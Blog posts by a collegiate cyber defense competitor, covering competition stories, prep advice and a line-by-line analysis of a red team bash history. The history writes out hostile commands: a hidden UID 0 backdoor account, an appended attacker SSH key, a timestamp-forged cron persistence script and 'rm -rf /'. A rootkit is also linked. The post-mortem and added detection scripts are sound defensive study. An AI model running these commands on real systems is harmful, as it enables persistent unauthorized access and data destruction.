
Red Star, Schmed Star

 

In MACCDC 2015 Regionals the network started out with the VMs outlined in our team packets. Our team captain was away from our tables handling other administrative duties. An ‘inject’ came through which required us to use “Office Software” to create something, I can’t recall if it was a PowerPoint or Word document, to explain something that was going on with the network or systems. Along with the inject a new VM appeared in our vSphere console. It was a Linux system labelled “Red Star”. We quickly launched it and realized this flavor of Linux has a GUI rather than just a console, but everything was in a different language, one that our system administrators couldn’t read. We all left our seats and surrounded our teammate to see if it was something maybe we could read, but it wasn’t 😦 We tried carelessly clicking around trying to change the language to English, without success.


Our team captain came back from her assignment and needed an update on what we were doing. We explained that we couldn’t read the language on the new system and were struggling to complete the new inject we had received. She was standing over the shoulder of one of our system administrators and looked down at the new Linux box. Her eyes focusing on the foreign letters on the screen, she exclaimed excitedly “I can read this! It’s Korean!”. It was a eureka moment for all of us. It was like when Lex Murphy realized it was a Unix system. (https://www.youtube.com/watch?v=dFUlAQZB9Ng)

Our team captain is of Korean descent.

The Linux system that was injected into the game was Red Star OS: https://en.wikipedia.org/wiki/Red_Star_OS

It’s not the hard things that trip you up, it’s the small stuff you waste time on.

 

 

A Face for Radio.

On Friday, I attended, as an observer, the 2016 MACCDC Regionals @ JHU-APL. Upon arrival I was asked to sign in. I was given a visitor’s badge, a pamphlet and a few other flyers. I put the lanyard from the badge over my head, threw the rest in my backpack and proceeded to the mezzanine. I mingled and chatted with old friends: blue teamers, red teamers, black teamers and some sponsors. I hung out for a couple hours and went home to begin my weekend.

Monday morning came around. I was getting my laptop out of my backpack and noticed the MACCDC pamphlet still in my pack. I took it out and put it on the desk. While waiting for my laptop to start, trying to escape the Monday morning fog, I was sipping my coffee and opened the MACCDC pamphlet to the table of contents and started reading.

Something caught my eye to the left of the table of contents.

BAM!!!

My picture.

Inside Cover

The full PDF of the visitor pamphlet: MACCDC_2016_Pamphlet.

MACCDC: Qualifiers – How to prepare

The regional CCDC qualifying round for the Mid-Atlantic region is dubbed ‘Virtual Qualifiers’, because it is held on virtual servers in Amazon’s EC2 cloud infrastructure.

In order to properly prepare for such an event it’s best to know a little bit about it. The best source of information is people who have participated in years past. The second best source is, of course, this site. Familiarize yourself with the historical data I have gathered from past competitions.

Registration & Scoring:

Registration and scoring is done through threatspace: https://sb2.threatspace.net

Don’t let the day of competition be the first day you’ve looked at threatspace. Make yourself as familiar with it as you can, it will help you to feel comfortable and confident, and can shave time off from trying to figure out their site during the competition.

Scoring is done by something we call ‘scorebot’. It is the name we have given the scoring engine for the MACCDC region because it often uses the username ‘scorebot’ to log into systems. It is an automated system that checks whether your scored services are up. ‘Scorebot’ reports this and displays it in pretty graphs and colors on threatspace’s website. You can change ‘scorebot’s password, and I recommend doing so, as it is often set to “chiapet1” and has been for years. [A future post might discuss the necessity for open sourcing the scorebot]

How many systems and which:

Typically you are given 4 systems, 2 Windows & 2 *nix. Again, check the resources I have provided; they will help you figure out which systems the organizers like to bring back year after year.

Team Structure:

This has been gone over before in other posts on other sites, and I’m sure each school or region will have its own twist on it, but make sure you have the best man/woman for the job. Some members of your team will be good at everything and some will have only a specialty or two. Make sure you put the best person on the keys for each system.

In qualifiers there are only 4 systems but 8 team members. Naturally we split up into teams of 2 per system: one person on the keys and the other as researcher. Unlike MACCDC regionals, you have full-blown internet access; there is no air-gap. The person in the ‘researcher’ role is there to look things up and provide support to the person on the keys. They should not be looking up things like “how to turn on your firewall” or “adding a user in AD”; those are things you should already know how to do. Instead they are most useful looking up how to administer or harden the web app and back end for software you’ve never seen before.

What to prepare for:

Don’t stand up 12 VMs and base your practice environment on one of the topologies from the regional competition until you get there.

Don’t spend all your time practicing for regionals if you haven’t gotten past qualifiers. Remember, you must get past qualifiers first. With that said, you will need to rehearse for regionals in addition to qualifiers.

How to prepare:

Since qualifiers are held in Amazon’s EC2 cloud infrastructure, so should your practice environment for qualifiers be. Go sign up for the service and stand up 4 VMs. There are pre-made images for the systems you will likely see. A couple hundred dollars’ worth of Amazon credits should be enough for your team to get plenty of practice. If your school has a cyber security club, maybe you can approach them about funding it. If not, have each person put in $20. It’s not a huge investment and it will get you started.

Schedule:

The MACCDC qualifier is only 4 hours long. Time is of the essence. There are something like 32 schools in the MACCDC region. Generally qualifiers are held ~8 teams per day over 4 days. As a school you have the option of choosing which day you would like to compete on, but you don’t always get the day you choose. Theories on which day to pick:

  • Choosing day 1 means the environment is new to the red team, so they won’t be familiar with it, but if anything is wrong with the infrastructure you will be the test dummies who find it.
  • Choosing a later day means the infrastructure should be fully tested, but the red team will already know all the ins and outs of all the systems.
Things I’ve seen go wrong:
  • People getting locked out of their own boxes. (guilty)
  • Overly complex passwords don’t play nice. I’m not sure whether it is threatspace’s website, their database or input sanitization, but passwords with a lot of symbols will cause ‘scorebot’ to incorrectly report a service as down. Choose a long alphanumeric string instead.
A word of advice:
  • Do continuous pings to each of your scored systems so you’ll know when they go down. Don’t rely on ‘scorebot’.
  • Do nmap scans of your scored boxes, make sure the services you need up are up and responding. Check them from an outside computer. Do this constantly as things will change often in 4 hours.
  • You only have 4 hours: Keep It Simple Stupid!
  • Eat and go to the bathroom before competition starts. If allowed at your facility have a bottle of water with you.
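As an added example (not from the original post), here is the kind of poller the two bullets above describe: probe each scored host/port yourself and print only state changes, so a service dropping mid-competition shows up immediately instead of when scorebot’s graph catches up. The target list is constructed; swap in the hosts and ports from your packet and run it from a machine outside the scored boxes.

```python
"""Poll scored services from outside and report only UP/DOWN transitions.

Added example, not part of the original post. SCORED is a constructed
sample; replace it with the host/port pairs from your team packet.
"""
import socket
import time
from typing import Callable, Dict, Iterable, List, Tuple

Target = Tuple[str, int]
Connector = Callable[[str, int], bool]


def tcp_connect(host: str, port: int, timeout: float = 2.0) -> bool:
    """True if a full TCP handshake completes; False on refusal or timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def probe(targets: Iterable[Target], connector: Connector = tcp_connect) -> Dict[Target, bool]:
    """Probe every (host, port) once and return its up/down state."""
    return {(host, port): bool(connector(host, port)) for host, port in targets}


def transitions(previous: Dict[Target, bool], current: Dict[Target, bool]) -> List[str]:
    """List services whose state differs from the previous round."""
    events: List[str] = []
    for target in sorted(current):
        if target not in previous:
            continue                      # first observation: nothing to compare yet
        before, now = previous[target], current[target]
        if before and not now:
            events.append(f"DOWN {target[0]}:{target[1]}")
        elif now and not before:
            events.append(f"UP   {target[0]}:{target[1]}")
    return events


def watch(targets: List[Target], interval: float = 15.0, rounds: int = 0,
          connector: Connector = tcp_connect) -> None:
    """Poll forever (rounds=0) or a fixed number of rounds, printing changes."""
    previous: Dict[Target, bool] = {}
    done = 0
    while rounds == 0 or done < rounds:
        current = probe(targets, connector)
        if not previous:                  # print the baseline once
            for (host, port), up in sorted(current.items()):
                print(time.strftime("%H:%M:%S"), "UP  " if up else "DOWN", f"{host}:{port}")
        for event in transitions(previous, current):
            print(time.strftime("%H:%M:%S"), event)
        previous = current
        done += 1
        if rounds == 0 or done < rounds:
            time.sleep(interval)


if __name__ == "__main__":
    # Constructed sample: SSH, HTTP and FTP on the PBX/web boxes of a qualifier set.
    SCORED: List[Target] = [("10.10.10.110", 22), ("10.10.10.110", 80),
                            ("10.10.10.110", 21), ("10.10.10.120", 22)]
    watch(SCORED)
```

A completed TCP handshake only proves the port is open, not that the service behind it answers correctly, so for HTTP or FTP add a page fetch or banner read on top of this; the transition logic stays the same.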
Red Team activity:

2013: I didn’t participate in competition but friends did and did not remember any particular red team activity in the qualifiers.

2014: We didn’t see any red team activity, that is, we didn’t see any red team activity.

2015: There was a lot of red team activity. I have made blog posts about it, and so have others. Also, on one of our windows boxes they kept standing up a telnet server.

Feedback:

How do you prepare for the qualifiers? What are the qualifiers like in your region? Leave a comment below.

Summer Break: Stay busy

As I wrapped up my final exam and went to the Green Turtle with a classmate, I was introduced to some people who were interested in playing CCDC in 2016. They knew I had participated the 2 previous years and wanted to know what they should be doing to prepare over the summer before joining the CCDC club in the fall. I forget what I actually told them, but thinking about it afterwards, why didn’t I have a long list of items ready for them? Hence this post.

Summer really is a great time to start preparing for next year’s CCDC. Most people have time off in the summer, which normally means a little more free time. Think about what role you might want to play in CCDC, then steer your training towards it. You should naturally gravitate to something that interests you; you will always put more into something you find interesting. Here are some ideas:

  • Firewall administration: Cisco ASA, pfSense, iptables
  • Windows Server Active Directory
  • Database: MSSQL, MySQL, PostgreSQL
  • Webserver administration: Apache, IIS, Nginx
  • Mailserver administration: OWA, SquirrelMail
  • Forensics: memory analysis, pcaps, log analysis
  • Windows sys-admin: firewall, users, services
  • *nix sys-admin: iptables, pf, users, groups, services

Find something you like and dig-in. Summer break is time for you to really explore, because when school starts you won’t have the same freedom in your schedule.

Start or join a CTF team. People who are naturally good at team-based CTFs will often be good at CCDC, since they are similar.

CCDC takes a lot of time. Practicing takes time. Setting up environments takes time. Just because CCDC limits you to 8 players doesn’t mean you can only have 8 people in your CCDC club. The more people you can spread responsibility across, the more time you’ll have.

Treat CCDC like a sports team. You have to show up for practice or you can’t play in the big game. Doing CTFs and CCDC rehearsals will weed-out who is willing to commit and who doesn’t have time for it. It will also help resolve personality conflicts sooner rather than later.

Test each-other:

Create VMs on flash drives and trade them with each other. See if you can figure out what is misconfigured and what needs to be done to harden that system. This is also a good way to practice forensics: as you work on hacking each other’s VMs, capture the traffic in pcaps and take memory dumps, then give those to the forensics person/s without telling them what happened and see if they can identify what is going on. You can never have enough practice standing up, configuring and securing a LAMP server. Make sure you know how to test for and patch Heartbleed and Shellshock.

Challenge each other to write small scripts to automate things. As you perform repetitive tasks you’ll see where you can use scripts and where you can’t. Don’t try to automate everything; that plan will fail. Writing scripts will help you practice working at a command line, troubleshooting and regex. Start with log files:

tail -f /var/log/auth.log | grep Failed
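As an added example that is not part of the original post, here is the next step up from that one-liner: a script that reads the same auth.log lines and counts failed SSH logins per source address and username, so the password guessing you would otherwise watch scroll past becomes a ranked list. The log lines inside it are constructed to match the usual sshd format; pipe a real file in on stdin.

```python
"""Summarise failed SSH logins from auth.log, the data that
`tail -f /var/log/auth.log | grep Failed` streams past you.

Added example, not from the original post. SAMPLE_LOG is constructed in the
usual Debian/Ubuntu sshd format; real input is read from stdin when piped.
"""
import re
import sys
from collections import Counter
from typing import Dict, Iterable, Tuple

# e.g. "Failed password for invalid user admin from 203.0.113.5 port 4112 ssh2"
FAILED = re.compile(
    r"Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)

SAMPLE_LOG = """\
Mar 14 21:02:11 pbx sshd[2201]: Failed password for root from 203.0.113.5 port 4112 ssh2
Mar 14 21:02:13 pbx sshd[2201]: Failed password for root from 203.0.113.5 port 4113 ssh2
Mar 14 21:02:14 pbx sshd[2203]: Failed password for invalid user admin from 203.0.113.5 port 4114 ssh2
Mar 14 21:02:20 pbx sshd[2207]: Accepted publickey for ec2-user from 10.10.10.5 port 50122 ssh2
Mar 14 21:03:01 pbx sshd[2210]: Failed password for scorebot from 198.51.100.9 port 3301 ssh2
Mar 14 21:03:02 pbx CRON[2212]: (root) CMD (/root/.mmd)
"""


def failed_logins(lines: Iterable[str]) -> Dict[Tuple[str, str], int]:
    """Count failures per (source IP, username); non-matching lines are ignored."""
    counts: Counter = Counter()
    for line in lines:
        m = FAILED.search(line)
        if m:
            counts[(m.group("ip"), m.group("user"))] += 1
    return dict(counts)


def noisy_sources(lines: Iterable[str], threshold: int = 3) -> Dict[str, int]:
    """Source IPs with at least `threshold` failures across all usernames."""
    per_ip: Counter = Counter()
    for (ip, _user), n in failed_logins(lines).items():
        per_ip[ip] += n
    return {ip: n for ip, n in per_ip.items() if n >= threshold}


def report(lines: Iterable[str]) -> str:
    """Human-readable summary, worst offenders first."""
    rows = sorted(failed_logins(lines).items(), key=lambda kv: -kv[1])
    return "\n".join(f"{n:4d}  {ip:15s}  {user}" for (ip, user), n in rows)


if __name__ == "__main__":
    source = sys.stdin if not sys.stdin.isatty() else SAMPLE_LOG.splitlines()
    print(report(source))
```

The regex is the part you will tune: every distribution and sshd version words these lines slightly differently, so test it against your own box’s log before trusting the counts, and extend it to cover the “Accepted” lines too if you want to see where a successful login came from right after a burst of failures.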

Summer time is for learning. Fall is for practicing. Spring time is for performing.

In closing: find a group of friends you can get together with and have fun solving challenges together. You’ll find your groove, have fun.

Teams who win CCDC stay sharp all year.

How do you plan on staying sharp this summer? Do you have any advice for would be competitors? Leave a comment below.

Post CCDC Survey

The 2015 CCDC season is finally over. A new season looms over the horizon.

I have created a short survey (<10 minutes).

I tried to cover items that are not talked about in slides for debriefings or ‘how to prepare for ccdc’ guide. I also try to include questions so we can find out a little-bit about the competitors instead of the competition.

Past and present competitors please take a minute and checkout the survey: http://goo.gl/forms/TAuQS7pr5D

All responses are private. None of the questions are required; all are optional.

Meet the Red Team

I collected these from my crontab during MACCDC 2015 regionals, running phonehome_script -h [hacker_handle]

This list is not comprehensive. It is not meant to frame or outline who the “enemy” is; the Red Team is not the enemy.

Instead, it is a list of excellent hackers you should be following on Twitter, and whose blogs you should read. Use this as a resource. These guys & gals will keep you up to date on the latest security trends, exploits and politics. They might even drop a dime about CCDC once in a while.

You can also use this as a resource for incident reports by tying a person to a handle through social media profiles.

dlcowen: @HECFBlog – http://www.hecfblog.com & https://github.com/dlcowen
mubix: @mubix & http://www.room362.com
darkwolf:
jess: @jessevarsalone
r00t0v3rr1d3: @r00t0v3rr1d3 – http://cevincere.com
gaz_:
m0r3sh311s: http://m0r3sh3lls.blogspot.com/ & https://github.com/m0r3Sh3LLs
cmcc:
rade:
jofo: @jofo
sapling:
veritas:
RustyB:
pasv:
skolor: @skolor
hal3001:
genxweb: @genxweb – http://www.digitaloffensive.com
Yeti:
phat32: @phat32 – http://www.social-engineer.org
recompiler: @recompiler – http://death-merchant.blogspot.com
mechlovin:
wik:
cylus: @cylussec & http://cylus.org/blog/
_cg_:
mstaint: @mstaint
Marqo09: @marqo09
mads:
rsmudge2015: @rsmudge & @amitagehacker
slicerfox:
warezjoe: @warezjoe

cat /etc/crontab

“o noes its melting”

“o noes its melting” was one of the last things I saw on my terminal in the final hour on the PBX box in MACCDC qualifiers.

I can’t recall exactly what showed up on my terminal but it was something like:

echo "o noes its melting" | wall && rm -rf /

Then all of my commands stopped working. Every single command stopped working, except for one, “history” and well, the rest is history…

 

1 who
2 ps -ef
3 /etc/init.d/httpd stop
4 ps -ef
5 nano /etc/new
6 nano /etc/crontab
7 nano /etc/new
8 /etc/init.d/crond restart
9 exit
10 useradd -o -u 0 -g 0 mysqld
11 echo -e "r3dt3am\nr3dt3am\n" | passwd mysqld
12 echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDOLN4rECfgWn7MunohWjJtbFQf/V1f8tgAWNFONqJa8z5QkgA/xRRG2+v5TZHwHxquT89VO4EYh3Whv7ot3ffazQqbfgnMuAZuvDNjoxSc7qyCmtHshwpeP2zUsnr4Y+AH87OtsYsnlTOgQyGzh5QsDnDtwSHSkhtSnM58mtGBZqhnAARkeA4Cie3+djrhfGzJ+wRT/FtSdzW8OMauPMHf+3jVgXoHFk605G+47KPqfCFdXVoy9YPrjDVqccKuQ96RBDJcJt1OF0YpMJA9u0NnYglUEbwVXt4LXV7XAbIBocWAqKtA26zmlgO9lCyqOsq44XQ+/dmmSwtNEel3SnaF root@winnt" >> /root/.ssh/authorized_keys
13 ls
14 cd ll
15 cd ..
16 ls
17 cd ec2-user/
18 ls
19 ls
20 cd COPYING
21 ls
22 cat COPYING
23 cd .ssh
24 ls
25 cat authorized_keys
26 cd ..
27 ls
28 cd ..
29 ls -la
30 cd scorebot/
31 ls
32 cd .ssh
33 cd /root/.ssh
34 cd
35 cd /root
36 ls
37 cd /tmp
38 ls
39 cat vmcheck
40 cat dmitest
41 cat xingyiquan/
42 cd xingyiquan/
43 ls
44 less README
45 cd ..
46 ls
47 tar cvzf xingyiquan
48 tar cvzf xingyiquan.tgz xingyiquan/
49 ls
50 ls
51 rm xingyiquan*
52 rm -rf xingyiquan/
53 ls
54 tar xvzg 1rt.tgz
55 tar xvzf 1rt.tgz
56 ls
57 rm 1rt.tgz xingyiquan/
58 rm -rf xingyiquan/
59 ls
60 cd /rot
61 cd /root
62 ls
63 cd .ssh
64 ls
65 cd ..
66 ls
67 ps aux
68 last
69 w
70 nano /root/.mmd
71 chmod +x /root/.mmd
72 touch -r /root/.rnd /root/.mmd /etc/cron.d/cron-apt
73 echo "5 * * * * root /root/.mmd" >> /etc/cron.d/cron-apt
74 ld -lsh
75 ls -lah
76 df
77 df -h
78 iptables -I INPUT -p icmp -j ACCEPT
79 iptables -I OUTPUT -p icmp -j ACCEPt
80 iptables -I OUTPUT -p icmp -j ACCEPT
81 netstat -tupn
82 cd /etc/vsftpd/
83 ls
84 cat user_list
85 cat ftpusers
86 cat vsftpd
87 cat vsftpd.conf
88 nano vsftpd.conf
89 iptables -I INPUT 2 -p tcp --dport 21 =j ACCEPT
90 iptables -I INPUT 2 -p tcp --dport 21 -j ACCEPT
91 iptables -I INPUT 3 -p tcp --dport 20 -j ACCEPT
92 cat /etc/passwd
93 passwd scorebot
94 ps -aux | grep vsftp
95 service vsftpd start
96 ps -aux | grep vsftp
97 cat /etc/passwd
98 cat /etc/shadow
99 passwd admin
100 cat /etc/shadow
101 cat /etc/passwd | grep sql
102 passwd mysqld
103 passwd ec2-user
104 netstat -tupn
105 passwd scorebot
106 netstat -tupn
107 passwd-master
108 passwd-wwwadmin
109 asterisk -r
110 who
111 netstat -tupn
112 iptables -I INSERT -s 173.12.15.68 -j DROP
113 iptables -I INPUT -s 173.12.15.68 -j DROP
114 netstat
115 lastlog
116 who
117 ps -aux | grep ssh
118 ps -aux | grep sshd
119 ls
120 ]lls
121 cd
122 cd /bin/
123 ls
124 su admin
125 su
126 service vsftp start
127 envars
128 /usr/bin/bash
129 /bin/sh
130 /bin/bash
131 path
132 echo $path
133 echo $PATH
134 /usr/local/sbinls
135 /usr/local/sbin ls
136 /root/bin
137 ';sa,c

 

It’s been 1 month since qualifiers but as far as I remember the only line numbers that are mine are: 74 – 137. To be really clear 119 – 137 was grasping at straws, there wasn’t any output, there weren’t files, there weren’t any commands, and the box stopped scoring for the last 40 minutes.

The very last command which would have been #138 was ‘history’ which yielded all the wonderful output above.

Let’s step through this one chunk at a time and dissect it from the attacker’s point of view.

1 who
2 ps -ef
3 /etc/init.d/httpd stop
4 ps -ef

#Seeing who is currently logged into the box and what processes are running. Stopping my httpd service and checking to make sure it’s stopped, or whether there’s anything else that needs to be killed.

5 nano /etc/new
6 nano /etc/crontab
7 nano /etc/new
8 /etc/init.d/crond restart
9 exit

#Creating a new file ‘new’ (we won’t see what’s in it because the input went to nano, not bash). Editing the crontab. Restarting the cron daemon to pick up the edits to the cron table.

10 useradd -o -u 0 -g 0 mysqld
11 echo -e "r3dt3am\nr3dt3am\n" | passwd mysqld
12 echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDOLN4rECfgWn7MunohWjJtbFQf/V1f8tgAWNFONqJa8z5QkgA/xRRG2+v5TZHwHxquT89VO4EYh3Whv7ot3ffazQqbfgnMuAZuvDNjoxSc7qyCmtHshwpeP2zUsnr4Y+AH87OtsYsnlTOgQyGzh5QsDnDtwSHSkhtSnM58mtGBZqhnAARkeA4Cie3+djrhfGzJ+wRT/FtSdzW8OMauPMHf+3jVgXoHFk605G+47KPqfCFdXVoy9YPrjDVqccKuQ96RBDJcJt1OF0YpMJA9u0NnYglUEbwVXt4LXV7XAbIBocWAqKtA26zmlgO9lCyqOsq44XQ+/dmmSwtNEel3SnaF root@winnt" >> /root/.ssh/authorized_keys

#Creating a new user ‘mysqld’ with the password ‘r3dt3am’. The -o flag allows a non-unique UID, so the account gets UID 0 and GID 0: it is root under another name, with a name chosen to blend in with the other service accounts. Then appending their public key to root’s authorized_keys file, so if the blue team changes root’s password they can still log in with key authentication. #PersistenceIsABitch
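The two tricks above are easy to miss in a hurry, so as an added example (not part of the original post) here is a small audit that parses /etc/passwd for any account other than root with UID 0 and diffs root’s authorized_keys against a list of keys your team put there. The passwd and authorized_keys text is constructed for the demo, using the red team’s key from the history above; KNOWN_GOOD is assumed to be a list your team records from the box’s initial state.

```python
"""Audit for a second UID 0 account and for unknown keys in root's authorized_keys.

Added example, not from the original post. PASSWD and ROOT_AUTHORIZED_KEYS are
constructed; KNOWN_GOOD stands in for a list your team records at the start.
"""
from typing import List, Set, Tuple

Key = Tuple[str, str]          # (key type, base64 blob), comment deliberately excluded

PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
scorebot:x:500:500::/home/scorebot:/bin/bash
ec2-user:x:501:501:EC2 Default User:/home/ec2-user:/bin/bash
mysqld:x:0:0::/home/mysqld:/bin/bash
"""

# Constructed placeholder for the blue team's own key; not a real key.
BLUE_KEY_BLOB = "AAAAB3NzaC1yc2EAAAADAQABAAABAQCblueteamexamplekeyblobnotreal0000"
# The key the red team appended in line 12 of the history above.
RED_KEY_BLOB = "AAAAB3NzaC1yc2EAAAADAQABAAABAQDOLN4rECfgWn7MunohWjJtbFQf/V1f8tgAWNFONqJa8z5QkgA/xRRG2+v5TZHwHxquT89VO4EYh3Whv7ot3ffazQqbfgnMuAZuvDNjoxSc7qyCmtHshwpeP2zUsnr4Y+AH87OtsYsnlTOgQyGzh5QsDnDtwSHSkhtSnM58mtGBZqhnAARkeA4Cie3+djrhfGzJ+wRT/FtSdzW8OMauPMHf+3jVgXoHFk605G+47KPqfCFdXVoy9YPrjDVqccKuQ96RBDJcJt1OF0YpMJA9u0NnYglUEbwVXt4LXV7XAbIBocWAqKtA26zmlgO9lCyqOsq44XQ+/dmmSwtNEel3SnaF"

ROOT_AUTHORIZED_KEYS = (
    f'from="10.10.10.5" ssh-rsa {BLUE_KEY_BLOB} blueteam@jump\n'
    f"ssh-rsa {RED_KEY_BLOB} root@winnt\n"
)

KNOWN_GOOD: Set[Key] = {("ssh-rsa", BLUE_KEY_BLOB)}


def root_equivalent_accounts(passwd_text: str) -> List[str]:
    """Accounts other than root with UID 0 (what `useradd -o -u 0` leaves behind)."""
    found = []
    for line in passwd_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 7:
            continue                                  # not a passwd-format line
        name, uid = fields[0], fields[2]
        if uid == "0" and name != "root":
            found.append(name)
    return found


def parse_authorized_keys(text: str) -> List[Tuple[str, str, str]]:
    """(type, blob, comment) for each key line; a leading options field is skipped."""
    keys = []
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0].startswith("#"):
            continue
        # Options such as from="..." or command="..." may precede the key type.
        while parts and not parts[0].startswith(("ssh-", "ecdsa-", "sk-")):
            parts.pop(0)
        if len(parts) < 2:
            continue
        keys.append((parts[0], parts[1], " ".join(parts[2:])))
    return keys


def unknown_keys(text: str, known_good: Set[Key]) -> List[str]:
    """Describe keys present in authorized_keys that are not on the allow-list."""
    return [f"{ktype} {blob[:20]}... {comment or '(no comment)'}"
            for ktype, blob, comment in parse_authorized_keys(text)
            if (ktype, blob) not in known_good]


if __name__ == "__main__":
    print("extra UID 0 accounts:", root_equivalent_accounts(PASSWD))
    for entry in unknown_keys(ROOT_AUTHORIZED_KEYS, KNOWN_GOOD):
        print("unknown key in root's authorized_keys:", entry)
```

On a live box feed it the real files, root_equivalent_accounts(open("/etc/passwd").read()) and unknown_keys(open("/root/.ssh/authorized_keys").read(), KNOWN_GOOD), and run the key check over every other user’s authorized_keys as well; the history above shows the red team looking at ec2-user’s and scorebot’s too. Matching on (type, blob) rather than the comment matters, since the comment is free text an attacker can set to anything.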


13 – 38

#Looking around the users directories and checking their authorized_keys files.

39 cat vmcheck
40 cat dmitest

#I actually don’t know what these files contain, obviously they tell if a system is a VM or not(right?) but I don’t know what’s in the files.


41 cat xingyiquan/
42 cd xingyiquan/
43 ls
44 less README
45 cd ..
46 ls
47 tar cvzf xingyiquan
48 tar cvzf xingyiquan.tgz xingyiquan/
49 ls
50 ls
51 rm xingyiquan*
52 rm -rf xingyiquan/
53 ls
54 tar xvzg 1rt.tgz
55 tar xvzf 1rt.tgz
56 ls
57 rm 1rt.tgz xingyiquan/
58 rm -rf xingyiquan/

#I first thought this was some random character/name generated file/script. On a whim I googled it and found out what it really is: Xingyiquan Linux 2.6.x / 3.x Rootkit. I have yet to figure out what 1rt.tgz is. Despite this being an actual rootkit I don’t see it being compiled or loaded: the xingyiquan directory already sitting in /tmp is tarred up (48) and deleted (52), 1rt.tgz is extracted (55), and the directory is removed again (58).


59 – 69

#Changing and listing directories, then checking running processes and recent logins (ps aux, last, w).

70 nano /root/.mmd
71 chmod +x /root/.mmd
72 touch -r /root/.rnd /root/.mmd /etc/cron.d/cron-apt
73 echo "5 * * * * root /root/.mmd" >> /etc/cron.d/cron-apt

#Create the hidden file .mmd, fill it with a bash script, make it executable, then use touch -r to copy the atime/mtime of /root/.rnd onto both /root/.mmd and /etc/cron.d/cron-apt so neither stands out in a listing sorted by date. Add a cron job to execute /root/.mmd every hour at minute 5, e.g. 2:05, 3:05, 4:05. Note that touch can only set atime and mtime; the ctime of both files is still updated to the moment they were touched.
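As an added example, not part of the original post, the script below looks for the two things the commands above leave behind: a cron entry that executes something out of /root, /tmp or a home directory (or any hidden file), and a file whose mtime was backdated with touch -r. The second check works because touch and utime() can only set atime and mtime; the kernel stamps ctime with the current time on that same call, so a file “last modified” a year ago but “changed” a minute ago is the tell. The cron.d content is constructed; the timestamp demo creates its own temporary files. Caveat: a root attacker who resets the system clock first, or edits the inode directly, can defeat the ctime check; it catches the quick form shown here.

```python
"""Flag cron jobs that run from attacker-writable paths and files with a backdated mtime.

Added example, not from the original post. CRON_APT is constructed to match
the append at line 73 above; demo_timestomp() creates its own temp files.
"""
import os
import re
import tempfile
import time
from typing import List

CRON_APT = """\
# Run apt maintenance nightly
MAILTO=root
0 4 * * * root test -x /usr/sbin/cron-apt && /usr/sbin/cron-apt
5 * * * * root /root/.mmd
"""

SUSPECT_PATH = re.compile(r"(^|\s)(/root/|/home/|/tmp/|/var/tmp/|/dev/shm/)")
HIDDEN_NAME = re.compile(r"/\.[^/\s]+")        # a path component that starts with '.'


def suspicious_cron_jobs(text: str, system_crontab: bool = True) -> List[str]:
    """Job lines whose command lives in a home, temp or hidden location.

    system_crontab=True is the /etc/crontab and /etc/cron.d layout (five time
    fields, a user, then the command); per-user crontabs have no user column.
    """
    hits = []
    for line in text.splitlines():
        s = line.strip()
        if not s or s.startswith("#") or "=" in s.split()[0]:
            continue                                # blank, comment or VAR=value
        if s.startswith("@"):                       # @reboot, @hourly, ...
            skip = 2 if system_crontab else 1
        else:
            skip = 6 if system_crontab else 5
        fields = s.split(None, skip)
        if len(fields) <= skip:
            continue
        command = fields[skip]
        if SUSPECT_PATH.search(command) or HIDDEN_NAME.search(command):
            hits.append(s)
    return hits


def timestomp_suspects(paths: List[str], slack: float = 60.0) -> List[str]:
    """Files whose ctime is more than `slack` seconds newer than their mtime.

    utime()/touch set atime and mtime, but the kernel sets ctime to *now* on
    that same call, so a backdated file shows mtime far behind ctime.
    """
    return [p for p in paths if os.stat(p).st_ctime - os.stat(p).st_mtime > slack]


def demo_timestomp() -> List[str]:
    """Write two files, backdate one the way `touch -r` would, report the flagged one."""
    workdir = tempfile.mkdtemp()
    honest = os.path.join(workdir, "honest.sh")
    stomped = os.path.join(workdir, ".mmd")
    for path in (honest, stomped):
        with open(path, "w") as fh:
            fh.write("#!/bin/bash\n")
    year_ago = time.time() - 365 * 86400
    os.utime(stomped, (year_ago, year_ago))          # atime/mtime only; ctime stays now
    return timestomp_suspects([honest, stomped])


if __name__ == "__main__":
    for job in suspicious_cron_jobs(CRON_APT):
        print("suspicious cron job:", job)
    for path in demo_timestomp():
        print("backdated mtime:", path)
```

Run the cron check over /etc/crontab, every file in /etc/cron.d and /etc/cron.{hourly,daily,weekly,monthly}, and each user’s crontab from /var/spool/cron (system_crontab=False for those); run the timestamp check over the same files plus anything executable under /root and /tmp.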


74 – 118

#74 – 118 are my commands. There are 2 things to know here. This was in the last hour of qualifiers. Why am I changing passwords and adding iptables rules this late in the game? The PBX box had been shut down. We had to request a restart, and when they restart your box it goes back to defaults. Yay!

At the 119 mark is when I saw "echo "o noes its melting" | wall && rm -rf /" on my terminal, and then it stopped responding to commands. As you can see in 119 – 137, I tried a bunch of different commands and nothing gave me any output. Some teammates also tried commands without any success. A simple ‘ls’ yielded no output. ‘cd /bin/’: nope, nothing. That is consistent with rm -rf / having removed /bin and /usr/bin out from under the still-running shell: every external command is gone, while ‘history’ still works because it is a bash builtin that only reads the shell’s in-memory list.

A couple of questions are still unanswered:

How did the red team get in, in the first place?

What did they do with the rootkit if it wasn’t installed?

What was actually in the crontab? .mmd? 1rt.tgz?

After the qualifiers that night I spent some time googling and found I wasn’t the only person this had happened to:

o noes its melting

I also started googling “xingyiquan” and found:

https://sw0rdm4n.wordpress.com/2014/11/03/xingyiquan-simple-linux-kernel-rootkit-for-kernel-3-x-and-kernel-2-6-x/

http://packetstormsecurity.com/files/128945/Xingyiquan-Linux-2.6.x-3.x-Rootkit.html

https://mobile.twitter.com/Sw0rdm4n/status/530411559080583168

http://www.ringlayer.net/

So I started investigating the rootkit; I wanted to know more. I found the rootkit at one of the links above. It has a pretty good README file which pretty much says it all. This rootkit was new at the time, released in November 2014. It is very customizable, from bind shell to reverse shell. You can set passwords on it. Netfilter hooks trigger the reverse shell on a configurable port. I encourage everyone to play around with this on a VM; Ubuntu or CentOS is fine. The only way you’ll know what to look for is to try it yourself.

